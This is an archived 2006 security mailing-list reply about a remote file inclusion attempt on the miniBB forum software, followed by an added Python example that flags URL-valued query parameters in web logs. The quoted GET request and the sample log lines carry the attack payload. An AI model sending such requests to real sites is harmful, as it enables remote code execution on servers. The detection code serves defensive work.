funsec mailing list archives

Re: interesting attack


From: Technocrat <dj.technocrat.listmail () gmail com>
Date: Wed, 19 Apr 2006 12:33:05 -0500

On 4/14/06, Peter Kosinar <goober () nuf ksp sk> wrote:
> GET /minibb/bb_admin.php?includeFooter=http://[attacker] HTTP/1.1

Without researching it, I would guess that it is a command/script
injection attack in a PHP-based BB system. Looks like she is using a
poor file handler for the injection. Again, this is without research.

-Technocrat

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
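
Added example, not part of the original thread: the request quoted in the message carries an absolute URL as the value of the includeFooter parameter, and the Python below flags that pattern in web server access logs. The Common Log Format layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a Common/Combined Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
# A parameter value that begins with a URL scheme (http://, https://, ftp://, ...)
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp -> %68ttp -> http)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def url_valued_params(log_line):
    """Return [(path, param, value)] for query parameters whose value is an absolute URL."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []  # not a parseable request line
    target = urlsplit(match.group("target"))
    hits = []
    # parse_qsl percent-decodes once; fully_decode handles extra layers
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = fully_decode(value)
        if SCHEME_RE.match(value):
            hits.append((target.path, name, value))
    return hits


# Constructed sample log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Apr/2006:10:00:01 +0000] "GET /minibb/index.php?action=vthread&forum=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [14/Apr/2006:10:00:07 +0000] "GET /minibb/bb_admin.php?includeFooter=http://files.example.net/x.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [14/Apr/2006:10:00:09 +0000] "GET /minibb/bb_admin.php?includeFooter=%68ttp%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" 200 312',
    '192.0.2.51 - - [14/Apr/2006:10:01:30 +0000] "GET /minibb/index.php?search=http+proxy+settings HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for path, param, value in url_valued_params(line):
            print(f"suspicious: {path} param={param} value={value}")
```

Legitimate parameters such as redirect targets also carry URLs, so a hit is a triage signal to check against the application's expected parameters rather than proof of an attack.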

